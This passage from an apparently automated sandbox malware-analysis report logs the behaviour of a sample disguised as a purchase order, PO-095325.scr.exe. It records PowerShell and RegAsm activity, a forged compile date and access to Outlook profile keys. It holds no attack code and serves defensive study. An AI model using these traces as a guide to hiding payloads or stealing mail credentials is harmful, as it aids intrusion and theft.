                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: PO-095325.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PO-095325.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\AtllasRunp\AtllasRunp\obj\Debug\Bienvenida.pdb source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2056029725.0000000008194000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2053643974.000000000725A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb@70s/ source: powershell.exe, 00000002.00000002.2055885190.000000000815A000.00000004.00000020.00020000.00000000.sdmp
                    Source: PO-095325.scr.exeStatic PE information: 0xC933C395 [Sat Dec 19 14:13:41 2076 UTC]
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FB24D1 push eax; iretd 0_2_04FB24DD
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FB1980 pushfd ; retf 0_2_04FB198D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01600B4D push edi; ret 4_2_01600CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01600C95 push edi; retf 4_2_01600C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0160DDEF push es; ret 4_2_0160DDF0
                    Source: PO-095325.scr.exeStatic PE information: section name: .text entropy: 7.959717171479094

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
